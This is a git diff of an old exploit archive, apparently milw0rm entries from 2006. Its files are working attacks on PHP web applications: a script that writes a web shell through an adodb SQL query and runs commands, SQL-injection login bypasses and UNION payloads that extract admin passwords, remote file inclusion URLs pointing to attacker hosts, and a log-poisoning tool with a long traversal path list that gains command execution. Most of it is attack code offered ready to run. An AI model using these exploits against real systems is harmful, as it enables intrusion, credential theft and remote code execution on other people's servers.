HTTP/1.0\r\n"; -$packet.="User-Agent: Googlebot/2.1\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Connection: Close\r\n\r\n"; -sendpacketii($packet); -if (!strstr($html,"*delim*")) -{ -echo $html; -die("\r\n\r\nExploit failed...\r\n"); -} -else -{ -echo "Exploit succeeded...\r\n"; -$temp=explode("*delim*",$html); -echo $temp[1]; -} -?> - -# milw0rm.com [2006-04-09] +#!/usr/bin/php -q -d short_open_tag=on + 126 )) + {$result.=" .";} + else + {$result.=" ".$string[$i];} + if (strlen(dechex(ord($string[$i])))==2) + {$exa.=" ".dechex(ord($string[$i]));} + else + {$exa.=" 0".dechex(ord($string[$i]));} + $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} + } + return $exa."\r\n".$result; +} +$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; +function sendpacketii($packet) +{ + global $proxy, $host, $port, $html, $proxy_regex; + if ($proxy=='') { + $ock=fsockopen(gethostbyname($host),$port); + if (!$ock) { + echo 'No response from '.$host.':'.$port; die; + } + } + else { + $c = preg_match($proxy_regex,$proxy); + if (!$c) { + echo 'Not a valid proxy...';die; + } + $parts=explode(':',$proxy); + echo "Connecting to ".$parts[0].":".$parts[1]." 
proxy...\r\n"; + $ock=fsockopen($parts[0],$parts[1]); + if (!$ock) { + echo 'No response from proxy...';die; + } + } + fputs($ock,$packet); + if ($proxy=='') { + $html=''; + while (!feof($ock)) { + $html.=fgets($ock); + } + } + else { + $html=''; + while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { + $html.=fread($ock,1); + } + } + fclose($ock); + #debug + #echo "\r\n".$html; +} + +$host=$argv[1]; +$path=$argv[2]; +$action=$argv[3]; +$cmd="";$port=80;$proxy=""; + +for ($i=3; $i<=$argc-1; $i++){ +$temp=$argv[$i][0].$argv[$i][1]; +if (($temp<>"-p") and ($temp<>"-P")) +{$cmd.=" ".$argv[$i];} +if ($temp=="-p") +{ + $port=str_replace("-p","",$argv[$i]); +} +if ($temp=="-P") +{ + $proxy=str_replace("-P","",$argv[$i]); +} +} +$cmd=urlencode($cmd); + +if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} +if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} + +#step 1->read DOCUMENT ROOT from phpinfo +$packet ="GET ".$p."include/adodb/tests/tmssql.php?do=phpinfo HTTP/1.0\r\n"; +$packet.="User-Agent: Googlebot/2.1\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Connection: Close\r\n\r\n"; +sendpacketii($packet); +$temp=explode("DOCUMENT_ROOT ",$html); +$temp2=explode(" ",$temp[1]); +$fullpath=$temp2[0]; +$fullpath=trim($fullpath); +echo "DOCUMENT ROOT ->".$fullpath."\r\n\r\n"; +$fullpath=str_replace("\\","\\\\\\\\",$fullpath); // win boxes +if ($fullpath=="") +{ +echo $html; +die("\r\n\r\nCannot read phpinfo ...\r\n"); +} + +#step 2->execute a query (you can regardless of magic_quotes_gpc) +$SQL ="SELECT '',0,0,0,0,0 "; +$SQL.="INTO DUMPFILE '".$fullpath."/suntzu.php' FROM poc.poc_user_account LIMIT 1"; +$SQL=urlencode($SQL); +$packet ="GET ".$p."include/adodb/server.php?sql=$SQL HTTP/1.0\r\n"; +$packet.="User-Agent: Googlebot/2.1\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Connection: Close\r\n\r\n"; +sendpacketii($packet); +if (strstr($html,"Access denied") || 
!strstr($html,"200 OK") || strstr($html,"Can't connect"))
+{
+echo $html;
+die("\r\n\r\nExploit failed...\r\n");
+}
+sleep(1);
+#step 3->launch commands
+$packet ="GET /suntzu.php?cmd=".$cmd." HTTP/1.0\r\n";
+$packet.="User-Agent: Googlebot/2.1\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Connection: Close\r\n\r\n";
+sendpacketii($packet);
+if (!strstr($html,"*delim*"))
+{
+echo $html;
+die("\r\n\r\nExploit failed...\r\n");
+}
+else
+{
+echo "Exploit succeeded...\r\n";
+$temp=explode("*delim*",$html);
+echo $temp[1];
+}
+?>
+
+# milw0rm.com [2006-04-09]
diff --git a/platforms/php/webapps/1653.txt b/platforms/php/webapps/1653.txt
index 00587d8eb..3912f071d 100755
--- a/platforms/php/webapps/1653.txt
+++ b/platforms/php/webapps/1653.txt
@@ -1,79 +1,79 @@ -##################################################### -# \_______________________________________________/ # -# | | # -# | | # -# | SECURITY ADVISORY | # -# | | # -# | | # -# /¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯\ # -##################################################### - - - - advisory: dnGuestbook <= v2.0 remote sql injection vulnerability - release: 2006-04-08 - author: snatcher [snatcher at gmx.ch] - country: switzerland |+| - - application: dnGuestbook <= v2.0 - download: http://www.designnation.de/ - app.descript: a php / mysql based guestbook script with an admin panel - - description: because of the false implemented userinputs you can login as admin with a simpel sql injection. - afterward you can exploit a not validated GET variable to get admin's email and password. - fingerprint: google -> "dnGuestbook by design-nation.de Version" -> 331 - msn -> "dnGuestbook by design-nation.de Version" -> 249 - conditions: php.ini -> magic_quotes_gpc = Off - greets: all security guys and coders over the world, honkey :>, .. - - - ----------- LOGIN AS ADMIN ---------- - -admin.php - line 771, 772 - $result = mysql_query ("SELECT * FROM dnguestbook_user WHERE mail='$mail' AND passwort='$passwort';"); - $eingeloggt = mysql_num_rows($result); - -if magic_quotes_gpc is off, the ' won't be escaped and you can inject malicious sql code here. -the script only verifies if a result is given back, and doesn't check, if the entered email and -password are the same like the email and password in the database. - -you gonna log in with following username (the password isn't necessary): - -E-Mail: ' OR 1 = 1 /* -Passwort: b0000m - -the query would look like this: - - SELECT * FROM dnguestbook_user WHERE mail='' OR 1 = 1 /* AND passwort='b0000m' - -the expression "/*" comments out the following part of the query. -the query will match always, because the WHERE - clause with "OR 1 = 1" is always true. - -now you are logged in as admin. 
how will you get the admin password? - - ----------- GET ADMIN PASSWORD ---------- - -in the adminpanel, you click the link "Beiträge". after that, you click the [e] right of a guestbook -entry. it doesn't matter which entry you choose. normally, you can edit here some guestbok entries. -the uri will look like this: - - http://yourhost.com/path_to_gb/admin.php?gbgo=edit&id=8 - -two variables are transmitted over GET but only "id=8" is relevant for us. - -admin.php - line 678 - $result = mysql_query ("SELECT * FROM dnguestbook_eintrag WHERE id=$id;"); - -you see, that the variable "id" isn't validated. you can inject malicious sql code again. -we make use of the UNION operator. - - http://yourhost.com/path_to_gb/admin.php?gbgo=edit&id=-999%20union%20select%200,passwort,0,mail,mail,mail,mail,0,0,passwort%20from%20dnguestbook_user - -the admin's email is shown in the field "*Ihre E-Mail:" and the admin's password in the field "*Ihr Text:" (plaintext !!) - -description of the UNION operator: - http://dev.mysql.com/doc/refman/5.0/en/union.html - -# milw0rm.com [2006-04-09] +##################################################### +# \_______________________________________________/ # +# | | # +# | | # +# | SECURITY ADVISORY | # +# | | # +# | | # +# /¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯\ # +##################################################### + + + + advisory: dnGuestbook <= v2.0 remote sql injection vulnerability + release: 2006-04-08 + author: snatcher [snatcher at gmx.ch] + country: switzerland |+| + + application: dnGuestbook <= v2.0 + download: http://www.designnation.de/ + app.descript: a php / mysql based guestbook script with an admin panel + + description: because of the false implemented userinputs you can login as admin with a simpel sql injection. + afterward you can exploit a not validated GET variable to get admin's email and password. 
+ fingerprint: google -> "dnGuestbook by design-nation.de Version" -> 331 + msn -> "dnGuestbook by design-nation.de Version" -> 249 + conditions: php.ini -> magic_quotes_gpc = Off + greets: all security guys and coders over the world, honkey :>, .. + + + +---------- LOGIN AS ADMIN ---------- + +admin.php - line 771, 772 + $result = mysql_query ("SELECT * FROM dnguestbook_user WHERE mail='$mail' AND passwort='$passwort';"); + $eingeloggt = mysql_num_rows($result); + +if magic_quotes_gpc is off, the ' won't be escaped and you can inject malicious sql code here. +the script only verifies if a result is given back, and doesn't check, if the entered email and +password are the same like the email and password in the database. + +you gonna log in with following username (the password isn't necessary): + +E-Mail: ' OR 1 = 1 /* +Passwort: b0000m + +the query would look like this: + + SELECT * FROM dnguestbook_user WHERE mail='' OR 1 = 1 /* AND passwort='b0000m' + +the expression "/*" comments out the following part of the query. +the query will match always, because the WHERE - clause with "OR 1 = 1" is always true. + +now you are logged in as admin. how will you get the admin password? + + +---------- GET ADMIN PASSWORD ---------- + +in the adminpanel, you click the link "Beiträge". after that, you click the [e] right of a guestbook +entry. it doesn't matter which entry you choose. normally, you can edit here some guestbok entries. +the uri will look like this: + + http://yourhost.com/path_to_gb/admin.php?gbgo=edit&id=8 + +two variables are transmitted over GET but only "id=8" is relevant for us. + +admin.php - line 678 + $result = mysql_query ("SELECT * FROM dnguestbook_eintrag WHERE id=$id;"); + +you see, that the variable "id" isn't validated. you can inject malicious sql code again. +we make use of the UNION operator. 
+ + http://yourhost.com/path_to_gb/admin.php?gbgo=edit&id=-999%20union%20select%200,passwort,0,mail,mail,mail,mail,0,0,passwort%20from%20dnguestbook_user + +the admin's email is shown in the field "*Ihre E-Mail:" and the admin's password in the field "*Ihr Text:" (plaintext !!) + +description of the UNION operator: + http://dev.mysql.com/doc/refman/5.0/en/union.html + +# milw0rm.com [2006-04-09] diff --git a/platforms/php/webapps/1654.txt b/platforms/php/webapps/1654.txt index 792e52554..d6c3d79d5 100755 --- a/platforms/php/webapps/1654.txt +++ b/platforms/php/webapps/1654.txt 
@@ -1,28 +1,28 @@ -Autonomous LAN party File iNclusion - --------------------------------------------- -Site:http://www.nerdclub.net/alp/ -Demo:http://www.redfiles.net/cup/credits.php - --------------------------------------------- -Example: - -http://victim.com/path/include/SQuery/gameSpy2.php?libpath=http://evilsite - ---------------------------------------------- -Credit:Codexploder'tq -Mail :codexploder@linuxmail.org -site :www.biyo.tk www.biyosecurity.be - ---------------------------------------------- -Google: - -intitle:"Autonomous LAN party" - --------------------------------------------- -Source: - -http://liz0zim.no-ip.org/alp.txt -http://www.blogcu.com/Liz0ziM/431845/ - -# milw0rm.com [2006-04-09] +Autonomous LAN party File iNclusion + +-------------------------------------------- +Site:http://www.nerdclub.net/alp/ +Demo:http://www.redfiles.net/cup/credits.php + +-------------------------------------------- +Example: + +http://victim.com/path/include/SQuery/gameSpy2.php?libpath=http://evilsite + +--------------------------------------------- +Credit:Codexploder'tq +Mail :codexploder@linuxmail.org +site :www.biyo.tk www.biyosecurity.be + +--------------------------------------------- +Google: + +intitle:"Autonomous LAN party" + +-------------------------------------------- +Source: + +http://liz0zim.no-ip.org/alp.txt +http://www.blogcu.com/Liz0ziM/431845/ + +# milw0rm.com [2006-04-09] diff --git a/platforms/php/webapps/1655.php b/platforms/php/webapps/1655.php index 6ecbd4d22..db59d4132 100755 --- a/platforms/php/webapps/1655.php +++ b/platforms/php/webapps/1655.php 
@@ -1,83 +1,83 @@ - "Powered By XBrite Members" -> 2800 - msn -> "Powered By XBrite Members" -> 581 - conditions: php.ini -> magic_quotes_gpc = Off - greets: all security guys and coders over the world, honkey :>, .. - terms of use: this exploit is just for educational purposes, do not use it for illegal acts. - - ----------------------------- members.php - line 197 ------------------------------------- -$query = @mysql_query ("select * from oz_members where id='".$_GET['id']."'"); ------------------------------------------------------------------------------------------ - -because magic_quotes_gpc is off, you can break out of the singel quotes and insert malicious sql code, -i.e. with a union operator. - - -*/ - -/*********************** CONFIGURATION ****************************/ - -$PATH_TO_FILE = 'http://yourhost.com/member.php'; // in example: http://yourhost.com/member.php -$USER_ID = 1; // from which user id do you want the password? default: 1 -$GET_VARS = '?action=members&act=show&id='; // do not change -$SQL_INJECTION = '0\' union select 1,1,1,1,1,1,1,1,1,real_name'. // do not change - ',name,pw,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,'. - '1,1,1,1,1,1,1,1,1,1,1,1 from oz_members where '. - 'id = '.$USER_ID.' /*'; - - -/**************************** MAIN ********************************/ - -$file_array = file($PATH_TO_FILE.$GET_VARS.urlencode($SQL_INJECTION))or die('couldn\'t open host!'); -foreach ($file_array as $now) - $html_content .= $now; - -$html_content = str_castrate($html_content); - -preg_match_all("!Alter:(.*?)!",$html_content,$username); /* gets username */ -preg_match_all("!Herkunft:(.*?)!",$html_content,$password); /* gets password */ - -if ($username[1][0] && $password[1][0] && $username[1][0] <> 'keineAngabe') { - echo 'username: '.$username[1][0].'
    '; - echo 'password: '.$password[1][0].''; -}else { - echo 'exploit failed!
    magic_quotes_gpc = Off ?'; -} -echo '




    -======================================================================
    -exploit: XBrite Members <= 1.1 remote sql injection vulnerability
    -release: 2006-04-09
    -author: snatcher [snatcher at gmx.ch]
    -======================================================================'; - -function str_castrate($string) { - $string = str_replace("\n", '', $string); - $string = str_replace("\r", '', $string); - $string = str_replace(" ", '', $string); - return $string; -} -?> - -# milw0rm.com [2006-04-09] + "Powered By XBrite Members" -> 2800 + msn -> "Powered By XBrite Members" -> 581 + conditions: php.ini -> magic_quotes_gpc = Off + greets: all security guys and coders over the world, honkey :>, .. + terms of use: this exploit is just for educational purposes, do not use it for illegal acts. + + +---------------------------- members.php - line 197 ------------------------------------- +$query = @mysql_query ("select * from oz_members where id='".$_GET['id']."'"); +----------------------------------------------------------------------------------------- + +because magic_quotes_gpc is off, you can break out of the singel quotes and insert malicious sql code, +i.e. with a union operator. + + +*/ + +/*********************** CONFIGURATION ****************************/ + +$PATH_TO_FILE = 'http://yourhost.com/member.php'; // in example: http://yourhost.com/member.php +$USER_ID = 1; // from which user id do you want the password? default: 1 +$GET_VARS = '?action=members&act=show&id='; // do not change +$SQL_INJECTION = '0\' union select 1,1,1,1,1,1,1,1,1,real_name'. // do not change + ',name,pw,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,'. + '1,1,1,1,1,1,1,1,1,1,1,1 from oz_members where '. + 'id = '.$USER_ID.' 
/*'; + + +/**************************** MAIN ********************************/ + +$file_array = file($PATH_TO_FILE.$GET_VARS.urlencode($SQL_INJECTION))or die('couldn\'t open host!'); +foreach ($file_array as $now) + $html_content .= $now; + +$html_content = str_castrate($html_content); + +preg_match_all("!Alter:(.*?)!",$html_content,$username); /* gets username */ +preg_match_all("!Herkunft:(.*?)!",$html_content,$password); /* gets password */ + +if ($username[1][0] && $password[1][0] && $username[1][0] <> 'keineAngabe') { + echo 'username: '.$username[1][0].'
    '; + echo 'password: '.$password[1][0].''; +}else { + echo 'exploit failed!
    magic_quotes_gpc = Off ?'; +} +echo '




    +======================================================================
    +exploit: XBrite Members <= 1.1 remote sql injection vulnerability
    +release: 2006-04-09
    +author: snatcher [snatcher at gmx.ch]
    +======================================================================'; + +function str_castrate($string) { + $string = str_replace("\n", '', $string); + $string = str_replace("\r", '', $string); + $string = str_replace(" ", '', $string); + return $string; +} +?> + +# milw0rm.com [2006-04-09] diff --git a/platforms/php/webapps/1656.txt b/platforms/php/webapps/1656.txt index 12e520b41..4e3cc6c48 100755 --- a/platforms/php/webapps/1656.txt +++ b/platforms/php/webapps/1656.txt @@ -1,39 +1,39 @@ -[+]File Inclusion: - Input passed to the "rub" parameter in "lire.php" isn't properly verified, - before it is used to include remote files - Successful exploitation requires that "register_globals" is enabled. - -[lire.php code] - - -[+]Exploit: Exploit http://[trajet]/lire.php?rub=http://[attacker]&cahier=1&art=1 -[+]http://[attacker]/compter.php Will be Included And Executed withe the privilege of the webserver - - -File Upload -Remote User can Upload jpg,jpeg,gif,bmp files without Identification , -[upload.php code:] - -Exploit : - -
    -Download File
    -
    - - -[Moroccan Security Team] - -contact: -simo64[at]gmail[dot]com - -# milw0rm.com [2006-04-09] +[+]File Inclusion: + Input passed to the "rub" parameter in "lire.php" isn't properly verified, + before it is used to include remote files + Successful exploitation requires that "register_globals" is enabled. + +[lire.php code] + + +[+]Exploit: Exploit http://[trajet]/lire.php?rub=http://[attacker]&cahier=1&art=1 +[+]http://[attacker]/compter.php Will be Included And Executed withe the privilege of the webserver + + +File Upload +Remote User can Upload jpg,jpeg,gif,bmp files without Identification , +[upload.php code:] + +Exploit : + + +Download File
    +
    + + +[Moroccan Security Team] + +contact: +simo64[at]gmail[dot]com + +# milw0rm.com [2006-04-09] diff --git a/platforms/php/webapps/1659.php b/platforms/php/webapps/1659.php index a336bbb98..9884a74cf 100755 --- a/platforms/php/webapps/1659.php +++ b/platforms/php/webapps/1659.php 
@@ -1,227 +1,227 @@ -#!/usr/bin/php -q -d short_open_tag=on - this works against register_globals=On \r\n"; -echo "a dork: inurl:\"lists/?p=subscribe\" | inurl:\"lists/index.php?p=subscribe\"\r\n"; -echo " -ubbi phplist\r\n\r\n"; - -if ($argc<4) { -echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n"; -echo "host: target server (ip/hostname)\r\n"; -echo "path: path to PHPList\r\n"; -echo "cmd: a shell command\r\n"; -echo "Options:\r\n"; -echo " -p[port]: specify a port other than 80\r\n"; -echo " -P[ip:port]: specify a proxy\r\n"; -echo "Examples:\r\n"; -echo "php ".$argv[0]." localhost /lists/ cat ./config/config.php\r\n"; -echo "php ".$argv[0]." localhost /lists/ ls -la -p81\r\n"; -echo "php ".$argv[0]." localhost / ls -la -P1.1.1.1:80\r\n"; -die; -} - -/* -software site: http://tincan.co.uk/phplist - -description: PHPlist is a double opt-in newsletter manager. It is written in PHP -and uses an SQL database for storing the information - -vulnerability: -vulnerable code in lists/index.php at lines 18-28: -... -if (isset($GLOBALS["developer_email"])) { - error_reporting(E_ALL); -} else { - error_reporting(0); -} -require_once dirname(__FILE__) .'/admin/commonlib/lib/magic_quotes.php'; - -require_once dirname(__FILE__).'/admin/init.php'; -require_once dirname(__FILE__).'/admin/'.$GLOBALS["database_module"]; -require_once dirname(__FILE__)."/texts/english.inc"; -include_once dirname(__FILE__)."/texts/".$GLOBALS["language_module"]; -... - -a lack in the code: -$database_module and $language_module vars are properly initialized in -config/config.php, but... when code would use them to include files -they are called with their GLOBALS corresponding vars. 
-So, if register_globals = On in php.ini you can include arbitrary file from -local resources, poc: - -http://[target]/[path_to_phplist]/lists/index.php?GLOBALS[developer_email]=1&GLOBALS[database_module]=../../../../../../etc/passwd - -also you can turn on all php messages and warnings until language_module is -called, as you can see. -This tool inject some code in log files and try to include them to -launch commands on target machine - */ -error_reporting(0); -ini_set("max_execution_time",0); -ini_set("default_socket_timeout",5); - -function quick_dump($string) -{ - $result='';$exa='';$cont=0; - for ($i=0; $i<=strlen($string)-1; $i++) - { - if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) - {$result.=" .";} - else - {$result.=" ".$string[$i];} - if (strlen(dechex(ord($string[$i])))==2) - {$exa.=" ".dechex(ord($string[$i]));} - else - {$exa.=" 0".dechex(ord($string[$i]));} - $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} - } - return $exa."\r\n".$result; -} -$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; -function sendpacketii($packet) -{ - global $proxy, $host, $port, $html, $proxy_regex; - if ($proxy=='') { - $ock=fsockopen(gethostbyname($host),$port); - if (!$ock) { - echo 'No response from '.$host.':'.$port; die; - } - } - else { - $c = preg_match($proxy_regex,$proxy); - if (!$c) { - echo 'Not a valid proxy...';die; - } - $parts=explode(':',$proxy); - echo "Connecting to ".$parts[0].":".$parts[1]." 
proxy...\r\n"; - $ock=fsockopen($parts[0],$parts[1]); - if (!$ock) { - echo 'No response from proxy...';die; - } - } - fputs($ock,$packet); - if ($proxy=='') { - $html=''; - while (!feof($ock)) { - $html.=fgets($ock); - } - } - else { - $html=''; - while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { - $html.=fread($ock,1); - } - } - fclose($ock); - #debug - #echo "\r\n".$html; -} -function make_seed() -{ - list($usec, $sec) = explode(' ', microtime()); - return (float) $sec + ((float) $usec * 100000); -} - -$host=$argv[1]; -$path=$argv[2]; -$cmd="";$port=80;$proxy=""; - -for ($i=3; $i<=$argc-1; $i++){ -$temp=$argv[$i][0].$argv[$i][1]; -if (($temp<>"-p") and ($temp<>"-P")) -{$cmd.=" ".$argv[$i];} -if ($temp=="-p") -{ - $port=str_replace("-p","",$argv[$i]); -} -if ($temp=="-P") -{ - $proxy=str_replace("-P","",$argv[$i]); -} -} -$cmd=urlencode($cmd); -if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} -if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} - -echo "[1] Injecting some code in log files ...\r\n"; -$CODE=""; -$packet="GET ".$p.$CODE." HTTP/1.0\r\n"; -$packet.="User-Agent: ".$CODE." 
Googlebot/2.1\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Connection: close\r\n\r\n"; -sendpacketii($packet); -sleep(1); - -$paths=array( -"../../../../../../../../../../var/log/httpd/access_log", -"../../../../../../../../../../var/log/httpd/error_log", -"../apache/logs/error.log", -"../apache/logs/access.log", -"../../apache/logs/error.log", -"../../apache/logs/access.log", -"../../../apache/logs/error.log", -"../../../apache/logs/access.log", -"../../../../apache/logs/error.log", -"../../../../apache/logs/access.log", -"../../../../../apache/logs/error.log", -"../../../../../apache/logs/access.log", -"../../../../../../apache/logs/error.log", -"../../../../../../apache/logs/access.log", -"../logs/error.log", -"../logs/access.log", -"../../logs/error.log", -"../../logs/access.log", -"../../../logs/error.log", -"../../../logs/access.log", -"../../../../logs/error.log", -"../../../../logs/access.log", -"../../../../../logs/error.log", -"../../../../../logs/access.log", -"../../../../../../logs/error.log", -"../../../../../../logs/access.log", -"../../../../../../../../../../etc/httpd/logs/acces_log", -"../../../../../../../../../../etc/httpd/logs/acces.log", -"../../../../../../../../../../etc/httpd/logs/error_log", -"../../../../../../../../../../etc/httpd/logs/error.log", -"../../../../../../../../../../var/www/logs/access_log", -"../../../../../../../../../../var/www/logs/access.log", -"../../../../../../../../../../usr/local/apache/logs/access_log", -"../../../../../../../../../../usr/local/apache/logs/access.log", -"../../../../../../../../../../var/log/apache/access_log", -"../../../../../../../../../../var/log/apache/access.log", -"../../../../../../../../../../var/log/access_log", -"../../../../../../../../../../var/www/logs/error_log", -"../../../../../../../../../../var/www/logs/error.log", -"../../../../../../../../../../usr/local/apache/logs/error_log", -"../../../../../../../../../../usr/local/apache/logs/error.log", 
-"../../../../../../../../../../var/log/apache/error_log", -"../../../../../../../../../../var/log/apache/error.log", -"../../../../../../../../../../var/log/access_log", -"../../../../../../../../../../var/log/error_log" -); - -for ($i=0; $i<=count($paths)-1; $i++) -{ -$a=$i+2; -echo "[".$a."] Trying with: ".$paths[$i]."\r\n"; -$packet ="GET ".$p."index.php?GLOBALS[developer_email]=1&GLOBALS[database_module]=".$paths[$i]; -$packet.="&GLOBALS[language_module]=".$paths[$i]."&cmd=".$cmd." HTTP/1.0\r\n"; -$packet.="User-Agent: Googlebot/2.1\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Connection: Close\r\n\r\n"; -sendpacketii($packet); -if (strstr($html,"56789")) -{ - $temp=explode("56789",$html); - echo $temp[1]; - echo "\r\nExploit succeeded...\r\n"; - die; -} -} -#if you are here... -echo "Exploit failed..."; -?> - -# milw0rm.com [2006-04-10] +#!/usr/bin/php -q -d short_open_tag=on + this works against register_globals=On \r\n"; +echo "a dork: inurl:\"lists/?p=subscribe\" | inurl:\"lists/index.php?p=subscribe\"\r\n"; +echo " -ubbi phplist\r\n\r\n"; + +if ($argc<4) { +echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n"; +echo "host: target server (ip/hostname)\r\n"; +echo "path: path to PHPList\r\n"; +echo "cmd: a shell command\r\n"; +echo "Options:\r\n"; +echo " -p[port]: specify a port other than 80\r\n"; +echo " -P[ip:port]: specify a proxy\r\n"; +echo "Examples:\r\n"; +echo "php ".$argv[0]." localhost /lists/ cat ./config/config.php\r\n"; +echo "php ".$argv[0]." localhost /lists/ ls -la -p81\r\n"; +echo "php ".$argv[0]." localhost / ls -la -P1.1.1.1:80\r\n"; +die; +} + +/* +software site: http://tincan.co.uk/phplist + +description: PHPlist is a double opt-in newsletter manager. It is written in PHP +and uses an SQL database for storing the information + +vulnerability: +vulnerable code in lists/index.php at lines 18-28: +... 
+if (isset($GLOBALS["developer_email"])) { + error_reporting(E_ALL); +} else { + error_reporting(0); +} +require_once dirname(__FILE__) .'/admin/commonlib/lib/magic_quotes.php'; + +require_once dirname(__FILE__).'/admin/init.php'; +require_once dirname(__FILE__).'/admin/'.$GLOBALS["database_module"]; +require_once dirname(__FILE__)."/texts/english.inc"; +include_once dirname(__FILE__)."/texts/".$GLOBALS["language_module"]; +... + +a lack in the code: +$database_module and $language_module vars are properly initialized in +config/config.php, but... when code would use them to include files +they are called with their GLOBALS corresponding vars. +So, if register_globals = On in php.ini you can include arbitrary file from +local resources, poc: + +http://[target]/[path_to_phplist]/lists/index.php?GLOBALS[developer_email]=1&GLOBALS[database_module]=../../../../../../etc/passwd + +also you can turn on all php messages and warnings until language_module is +called, as you can see. +This tool inject some code in log files and try to include them to +launch commands on target machine + */ +error_reporting(0); +ini_set("max_execution_time",0); +ini_set("default_socket_timeout",5); + +function quick_dump($string) +{ + $result='';$exa='';$cont=0; + for ($i=0; $i<=strlen($string)-1; $i++) + { + if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) + {$result.=" .";} + else + {$result.=" ".$string[$i];} + if (strlen(dechex(ord($string[$i])))==2) + {$exa.=" ".dechex(ord($string[$i]));} + else + {$exa.=" 0".dechex(ord($string[$i]));} + $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} + } + return $exa."\r\n".$result; +} +$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; +function sendpacketii($packet) +{ + global $proxy, $host, $port, $html, $proxy_regex; + if ($proxy=='') { + $ock=fsockopen(gethostbyname($host),$port); + if (!$ock) { + echo 'No response from '.$host.':'.$port; die; + } + } + else { + $c = preg_match($proxy_regex,$proxy); + 
if (!$c) { + echo 'Not a valid proxy...';die; + } + $parts=explode(':',$proxy); + echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; + $ock=fsockopen($parts[0],$parts[1]); + if (!$ock) { + echo 'No response from proxy...';die; + } + } + fputs($ock,$packet); + if ($proxy=='') { + $html=''; + while (!feof($ock)) { + $html.=fgets($ock); + } + } + else { + $html=''; + while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { + $html.=fread($ock,1); + } + } + fclose($ock); + #debug + #echo "\r\n".$html; +} +function make_seed() +{ + list($usec, $sec) = explode(' ', microtime()); + return (float) $sec + ((float) $usec * 100000); +} + +$host=$argv[1]; +$path=$argv[2]; +$cmd="";$port=80;$proxy=""; + +for ($i=3; $i<=$argc-1; $i++){ +$temp=$argv[$i][0].$argv[$i][1]; +if (($temp<>"-p") and ($temp<>"-P")) +{$cmd.=" ".$argv[$i];} +if ($temp=="-p") +{ + $port=str_replace("-p","",$argv[$i]); +} +if ($temp=="-P") +{ + $proxy=str_replace("-P","",$argv[$i]); +} +} +$cmd=urlencode($cmd); +if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} +if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} + +echo "[1] Injecting some code in log files ...\r\n"; +$CODE=""; +$packet="GET ".$p.$CODE." HTTP/1.0\r\n"; +$packet.="User-Agent: ".$CODE." 
Googlebot/2.1\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Connection: close\r\n\r\n"; +sendpacketii($packet); +sleep(1); + +$paths=array( +"../../../../../../../../../../var/log/httpd/access_log", +"../../../../../../../../../../var/log/httpd/error_log", +"../apache/logs/error.log", +"../apache/logs/access.log", +"../../apache/logs/error.log", +"../../apache/logs/access.log", +"../../../apache/logs/error.log", +"../../../apache/logs/access.log", +"../../../../apache/logs/error.log", +"../../../../apache/logs/access.log", +"../../../../../apache/logs/error.log", +"../../../../../apache/logs/access.log", +"../../../../../../apache/logs/error.log", +"../../../../../../apache/logs/access.log", +"../logs/error.log", +"../logs/access.log", +"../../logs/error.log", +"../../logs/access.log", +"../../../logs/error.log", +"../../../logs/access.log", +"../../../../logs/error.log", +"../../../../logs/access.log", +"../../../../../logs/error.log", +"../../../../../logs/access.log", +"../../../../../../logs/error.log", +"../../../../../../logs/access.log", +"../../../../../../../../../../etc/httpd/logs/acces_log", +"../../../../../../../../../../etc/httpd/logs/acces.log", +"../../../../../../../../../../etc/httpd/logs/error_log", +"../../../../../../../../../../etc/httpd/logs/error.log", +"../../../../../../../../../../var/www/logs/access_log", +"../../../../../../../../../../var/www/logs/access.log", +"../../../../../../../../../../usr/local/apache/logs/access_log", +"../../../../../../../../../../usr/local/apache/logs/access.log", +"../../../../../../../../../../var/log/apache/access_log", +"../../../../../../../../../../var/log/apache/access.log", +"../../../../../../../../../../var/log/access_log", +"../../../../../../../../../../var/www/logs/error_log", +"../../../../../../../../../../var/www/logs/error.log", +"../../../../../../../../../../usr/local/apache/logs/error_log", +"../../../../../../../../../../usr/local/apache/logs/error.log", 
